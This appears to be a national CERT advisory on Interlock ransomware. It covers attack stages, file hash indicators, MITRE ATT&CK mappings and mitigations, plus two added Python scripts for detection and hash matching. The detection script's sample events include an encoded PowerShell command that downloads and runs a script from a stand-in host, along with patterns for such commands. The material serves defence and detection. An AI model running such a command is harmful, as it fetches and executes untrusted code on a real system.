
7 August 2025     Advisory

MA-1376.082025: MyCERT Advisory - Advisory on Protecting Against Interlock Ransomware


1.0 Introduction

The Interlock ransomware variant was first observed in late September 2024, targeting businesses and critical infrastructure organisations in North America and Europe. According to a joint advisory released by the FBI, CISA, HHS and MS-ISAC, the actors select victims opportunistically and are financially motivated. Interlock actors have been observed using uncommon initial access methods: drive-by downloads from compromised legitimate websites, and the ClickFix social engineering technique, which tricks users into executing malicious payloads disguised as system fixes. The ransomware is capable of encrypting virtual machines (VMs) on both Windows and Linux platforms, and the threat actors employ a variety of tactics for discovery, credential access and lateral movement within networks.

2.0 Impact

Interlock ransomware can cause severe disruption by encrypting critical systems and exfiltrating sensitive data. It targets virtualised environments across Windows, Linux and FreeBSD platforms. Victims risk operational downtime, financial losses and reputational damage, especially if stolen data is publicly leaked. The absence of a ransom demand in the initial note adds uncertainty for victims, and the threat actors often follow through on their threat to publish stolen data if payment is not made.

3.0 Targets

Interlock ransomware primarily targets organisations across various sectors in North America and Europe, focusing on entities that rely on virtualised environments. Affected industries include business enterprises, healthcare, education and critical infrastructure. The actors conduct opportunistic attacks, exploiting exposed or vulnerable systems regardless of organisation size, and show particular interest in environments running Windows, Linux and FreeBSD operating systems.

4.0 Technical Details

4.1 Initial Access

Interlock actors typically gain initial access through drive-by downloads hosted on compromised websites. Malicious payloads are often disguised as fake browser or software updates, such as Google Chrome, Microsoft Edge, or security software like FortiClient or Cisco AnyConnect. In some cases, the group has used the ClickFix technique, where users are deceived into running a fake CAPTCHA that executes Base64-encoded PowerShell commands, launching the attack without the user realising.

4.2 Execution and Persistence

Once inside the system, Interlock actors use a fake executable that functions as a remote access trojan (RAT) to execute PowerShell scripts that place malicious files in the Windows Startup folder, allowing persistence on user login. They also modify Windows Registry run keys using PowerShell to ensure the malware continues running across reboots. These actions are disguised under legitimate-sounding names like “Chrome Updater” to evade detection.

4.3 Reconnaissance

To gather intelligence on the infected system, Interlock actors use PowerShell scripts to execute system discovery commands. These include checking the current user identity, system configuration, active services, logical drives, and ARP cache entries. This information helps the attackers map the environment and plan further actions such as lateral movement or privilege escalation.

4.4 Command and Control (C2)

For command and control operations, Interlock actors rely on tools such as Cobalt Strike and SystemBC, along with their own Interlock RAT and NodeSnake RAT. These tools allow attackers to maintain remote access, issue commands, and coordinate post-compromise activity across the network.

4.5 Credential Access, Lateral Movement and Privilege Escalation

After establishing remote access, Interlock actors deploy credential-stealing tools such as cht.exe and the keylogger klg.dll, which records keystrokes to a file named conhost.txt. They also use other information stealers such as Lumma Stealer and Berserk Stealer to collect credentials. The attackers move laterally using stolen credentials via Remote Desktop Protocol (RDP) or remote access tools such as AnyDesk and PuTTY. In some cases they have gained elevated privileges by compromising domain administrator accounts, possibly through Kerberoasting attacks.

4.6 Collection and Exfiltration

Before encryption, Interlock actors collect and exfiltrate data using tools like Azure Storage Explorer and AzCopy, uploading stolen data to cloud storage accounts. They also use file transfer applications such as WinSCP to exfiltrate data over FTP or SCP protocols. This exfiltrated data is then used as leverage in double extortion schemes.
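As an added example (not code from the advisory or from CISA), the behaviours described in 4.1 to 4.6 can be checked against endpoint telemetry. The Python below runs four such checks over constructed Sysmon-style events: decoding and inspecting an encoded PowerShell command line (4.1), a Run key value pointing into a user-writable path and a drop into the Startup folder (4.2), and rundll32 loading a module without a .dll extension, as with tmp41.wasd. The event field names and sample values are assumptions, not real telemetry.

```python
import base64
import re

# Constructed Sysmon-style events (sample data, not from the advisory): id 1 = process
# creation, 11 = file create, 13 = registry value set. Field names are assumptions.
SAMPLE_EVENTS = [
    {"id": 1, "cmdline": "powershell.exe -w hidden -enc " + base64.b64encode(
        "iwr http://example.invalid/u.ps1 | iex".encode("utf-16-le")).decode()},
    {"id": 13, "target": r"HKCU\Software\Microsoft\Windows\CurrentVersion\Run\Chrome Updater",
     "details": r"C:\Users\u\AppData\Roaming\conhost.exe"},
    {"id": 11, "target": r"C:\Users\u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\upd.lnk"},
    {"id": 1, "cmdline": r"rundll32.exe C:\Users\u\AppData\Local\Temp\tmp41.wasd,run"},
    {"id": 1, "cmdline": "notepad.exe notes.txt"},  # benign control
]

ENC_ARG = re.compile(r"-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]{8,})", re.I)
SUSPICIOUS_PS = re.compile(r"\b(iex|invoke-expression|iwr|downloadstring)\b", re.I)
USER_WRITABLE = re.compile(r"\\AppData\\|\\Temp\\|\\ProgramData\\", re.I)
RUNDLL32 = re.compile(r'rundll32(?:\.exe)?\s+"?([^",]+)', re.I)

def decode_encoded_command(cmdline):
    """Return the plaintext of a -EncodedCommand argument (Base64 of UTF-16LE), or None."""
    m = ENC_ARG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1)).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not valid Base64/UTF-16LE, so not an encoded command

def detect(events):
    """Return (technique_id, reason) for every event matching one of the advisory's TTPs."""
    findings = []
    for ev in events:
        cmd, target = ev.get("cmdline", ""), ev.get("target", "")
        if ev["id"] == 1:
            decoded = decode_encoded_command(cmd)
            if decoded and SUSPICIOUS_PS.search(decoded):
                findings.append(("T1059.001", "encoded PowerShell runs: " + decoded))
            m = RUNDLL32.match(cmd)
            if m and not m.group(1).lower().endswith(".dll"):  # e.g. tmp41.wasd
                findings.append(("T1218.011", "rundll32 loads non-.dll module: " + m.group(1)))
        elif ev["id"] == 13 and "\\CurrentVersion\\Run\\" in target:
            if USER_WRITABLE.search(ev.get("details", "")):
                findings.append(("T1547.001", "Run key points into user-writable path: " + target))
        elif ev["id"] == 11 and "\\Programs\\Startup\\" in target:
            findings.append(("T1547.001", "file dropped in Startup folder: " + target))
    return findings
```

These are heuristics: a Run key pointing into AppData is also how some legitimate per-user installers register, so treat the output as triage leads to confirm against the IoCs in section 5 rather than as verdicts.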

5.0 Indicators of Compromise (IoCs)

Table 1: File-Based IoCs (SHA-256)

File Name                SHA-256 Hash
1.ps1                    fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd
AnyDesk.exe              1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069
cht.exe                  c20baba26ebb596de14b403b9f78ddc3c13ce9870eea332476ac2c1dd582aa07
klg.dll                  a4f0b68052e8da9a80b70407a92400c6a5def19717e0240ac608612476e1137e
conhost                  44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1
StorageExplorer.exe      73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66
putty.exe                7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069
PsExec.exe               078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b
WinSCP-6.3.5-Setup.exe   8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3
Encryptor                e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1
Encryptor                c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6
Encryptor                28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f
tmp41.wasd (DLL)         No hash published; used post-encryption and deleted by the malware using the remove() function

Table 2: File-Based IoCs (SHA-1)

File Name      SHA-1 Hash
autorun.log    514946a8fc248de1ccf0dbeee2108a3b4d75b5f6
jar.jar        b625cc9e4024d09084e80a4a42ab7ccaa6afb61d
pack.jar       3703374c9622f74edc9c8e3a47a5d53007f7721e
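As an added example (not part of this advisory), the following Python matches files on disk against the SHA-256 and SHA-1 indicators in Tables 1 and 2 above; it hashes in chunks so large files do not need to fit in memory, skips files it cannot open, and reports which table entry matched. The only values in it are the digests from the tables; the directory to scan is supplied by the caller.

```python
import hashlib
import os
# Indicators copied from Tables 1 and 2 of this advisory, keyed by lower-case hex digest.
IOC_SHA256 = {
    "fba4883bf4f73aa48a957d894051d78e0085ecc3170b1ff50e61ccec6aeee2cd": "1.ps1",
    "1a70f4eef11fbecb721b9bab1c9ff43a8c4cd7b2cafef08c033c77070c6fe069": "AnyDesk.exe",
    "c20baba26ebb596de14b403b9f78ddc3c13ce9870eea332476ac2c1dd582aa07": "cht.exe",
    "a4f0b68052e8da9a80b70407a92400c6a5def19717e0240ac608612476e1137e": "klg.dll",
    "44887125aa2df864226421ee694d51e5535d8c6f70e327e9bcb366e43fd892c1": "conhost",
    "73a9a1e38ff40908bcc15df2954246883dadfb991f3c74f6c514b4cffdabde66": "StorageExplorer.exe",
    "7a43789216ce242524e321d2222fa50820a532e29175e0a2e685459a19e09069": "putty.exe",
    "078163d5c16f64caa5a14784323fd51451b8c831c73396b967b4e35e6879937b": "PsExec.exe",
    "8eb7e3e8f3ee31d382359a8a232c984bdaa130584cad11683749026e5df1fdc3": "WinSCP-6.3.5-Setup.exe",
    "e86bb8361c436be94b0901e5b39db9b6666134f23cce1e5581421c2981405cb1": "Encryptor",
    "c733d85f445004c9d6918f7c09a1e0d38a8f3b37ad825cd544b865dba36a1ba6": "Encryptor",
    "28c3c50d115d2b8ffc7ba0a8de9572fbe307907aaae3a486aabd8c0266e9426f": "Encryptor",
}
IOC_SHA1 = {
    "514946a8fc248de1ccf0dbeee2108a3b4d75b5f6": "autorun.log",
    "b625cc9e4024d09084e80a4a42ab7ccaa6afb61d": "jar.jar",
    "3703374c9622f74edc9c8e3a47a5d53007f7721e": "pack.jar",
}

def hash_file(path):
    """Return (sha256, sha1) hex digests, hashing in 1 MiB chunks so large files fit in memory."""
    h256, h1 = hashlib.sha256(), hashlib.sha1()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h256.update(chunk)
            h1.update(chunk)
    return h256.hexdigest(), h1.hexdigest()

def match_hashes(sha256, sha1):
    """Return the advisory's file name for a matching digest, or None if neither table matches."""
    return IOC_SHA256.get(sha256.lower()) or IOC_SHA1.get(sha1.lower())

def scan_tree(root):
    """Walk root and return [(path, ioc_name)] for every file whose digest is in the tables."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            try:
                digests = hash_file(path)
            except OSError:
                continue  # locked or unreadable file: skip it rather than abort the scan
            ioc = match_hashes(*digests)
            if ioc:
                hits.append((path, ioc))
    return hits
```

A hit on AnyDesk.exe, putty.exe, PsExec.exe, WinSCP-6.3.5-Setup.exe or StorageExplorer.exe identifies a specific build of a legitimate tool, so confirm whether its presence is authorised before treating it as evidence of compromise.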


Table 3: Tools Used by Interlock Actors

Tool Name              Description
AnyDesk                Remote access tool used for persistence and lateral movement
Cobalt Strike          Penetration-testing tool used for C2
PuTTY                  SSH tool used for lateral movement and remote sessions
SystemBC               Proxy and backdoor tool
NodeSnake RAT          Custom RAT used for C2 and persistence
Interlock RAT          Custom RAT used by the threat actors
PowerShell             Used for script execution, reconnaissance and persistence
AzCopy                 Used to exfiltrate data to Azure Blob Storage
StorageExplorer.exe    Used to browse Azure storage accounts
WinSCP                 File transfer tool used for data exfiltration
ScreenConnect          Used in cracked form for remote access
PsExec                 Executes commands and payloads on remote systems

6.0 MITRE ATT&CK Tactics and Techniques

Techniques are listed per tactic as Technique (ID): observed usage.

Initial Access
  • Drive-by Compromise (T1189): Compromised websites deliver disguised malware (e.g., fake browser/security updates).
  • User Execution: Malicious Copy and Paste (ClickFix) (T1204.004): A fake CAPTCHA prompts the user to execute Base64-encoded PowerShell commands.

Execution
  • Command and Scripting Interpreter: PowerShell (T1059.001): Executes scripts for installation, reconnaissance and persistence.

Persistence
  • Registry Run Keys / Startup Folder (T1547.001): Adds files to the Startup folder and modifies registry run keys for persistence.

Privilege Escalation
  • Valid Accounts: Domain Accounts (T1078.002): Uses compromised domain admin accounts for elevated privileges.

Defense Evasion
  • Masquerading: Match Legitimate Resource Name or Location (T1036.005): Disguises files under legitimate-looking names such as conhost.exe and conhost.txt.
  • System Binary Proxy Execution: Rundll32 (T1218.011): Executes the malicious DLL (tmp41.wasd) via rundll32.exe.
  • Indicator Removal: File Deletion (T1070.004): Deletes encryption binaries after execution (removeme function).

Credential Access
  • Input Capture: Keylogging (T1056.001): Uses klg.dll to log keystrokes to conhost.txt.
  • Credentials from Web Browsers (T1555.003): Steals browser-stored credentials.
  • Steal or Forge Kerberos Tickets: Kerberoasting (T1558.003): Potentially used to compromise domain admin accounts.

Discovery
  • System Owner/User Discovery (T1033): PowerShell retrieves the current user identity.
  • System Information Discovery (T1082): Retrieves OS, drive and hardware information via systeminfo and Get-PSDrive.
  • System Service Discovery (T1007): Identifies running services via Get-Service and tasklist /svc.
  • System Network Configuration Discovery (T1016): Uses arp -a to obtain network configuration and ARP cache data.

Lateral Movement
  • Remote Services: Remote Desktop Protocol (RDP) (T1021.001): Uses RDP with stolen credentials to spread.
  • Valid Accounts (T1078): Harvested credentials are reused for lateral movement.

Collection
  • Data from Cloud Storage (T1530): Uses StorageExplorer.exe to access Microsoft Azure Storage.

Command and Control
  • Ingress Tool Transfer (T1105): Transfers RATs and stealers such as cht.exe and klg.dll.
  • Remote Access Tools (T1219): Uses AnyDesk and PuTTY for remote control and lateral movement.
  • Command and Control (General) (TA0011): Uses Cobalt Strike, SystemBC, NodeSnake RAT and Interlock RAT.

Exfiltration
  • Exfiltration to Cloud Storage (T1567.002): Uses AzCopy to upload stolen data to Azure Blob Storage.
  • Exfiltration Over Alternative Protocol (T1048): Uses tools such as WinSCP to transfer stolen data externally.

Impact
  • Data Encrypted for Impact (T1486): Encrypts data using AES+RSA on Windows, Linux and FreeBSD.
  • Financial Theft / Extortion via Ransom Note (T1657): A ransom note is issued with a Tor contact and a threat to leak stolen data.

7.0 Recommendations

CyberSecurity Malaysia advises that system administrators implement the following mitigations to strengthen defenses against Interlock ransomware and similar threats. These recommendations are aligned with global best practices and the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and NIST.

For more information, please refer to the official advisory: 

https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-203a?utm_source=Interlock&utm_medium=GovDelivery

7.1 Recommendations for System Administrators

  • Implement Domain Name System (DNS) filtering to block access to malicious websites.
  • Deploy web access firewalls to prevent command injection and unauthorized access.
  • Train users to recognize and report phishing and social engineering attempts.
  • Disable hyperlinks in emails and add banners to emails received from external sources.
  • Develop and maintain a recovery plan with encrypted, offline, and immutable backups stored separately from production systems.
  • Enforce strong password policies in compliance with NIST standards; use long passwords and avoid frequent forced resets.
  • Require multi-factor authentication (MFA) for access to email, VPNs, and critical systems.
  • Apply identity, credential, and access management (ICAM) policies organization-wide.
  • Use time-based access controls (e.g., Just-in-Time access) for privileged accounts.
  • Ensure all operating systems, applications, and firmware are regularly updated and patched.
  • Prioritize patching known exploited vulnerabilities in internet-facing services.
  • Deploy endpoint detection and response (EDR) tools across virtual machines, endpoints, and servers.
  • Monitor network activity with tools capable of detecting abnormal and lateral movement behavior.
  • Filter inbound network traffic to block access from untrusted or unknown sources.
  • Install, enable, and regularly update antivirus and anti-malware software with real-time protection.
  • Segment networks to contain the spread of malware and restrict lateral movement.
  • Disable unused ports and unnecessary services on all systems.
  • Regularly review and audit user accounts, especially those with administrative privileges.
  • Apply the principle of least privilege to all user and system accounts.
  • Restrict or turn off command-line and scripting capabilities (e.g., PowerShell, CMD) where not needed.
  • Maintain frequent backups and regularly test restoration procedures.
  • Ensure all backups are encrypted, immutable, and cover the entire data infrastructure.

For further enquiries or incident reporting, please get in touch with Cyber999 through the following channels:

E-mail: cyber999[at]cybersecurity.my
Phone: 1-300-88-2999 (monitored during business hours)
Mobile: +60 19 2665850 (24x7 incident reporting line)
Business Hours: Mon - Fri 08:30 - 17:30 MYT

8.0 References
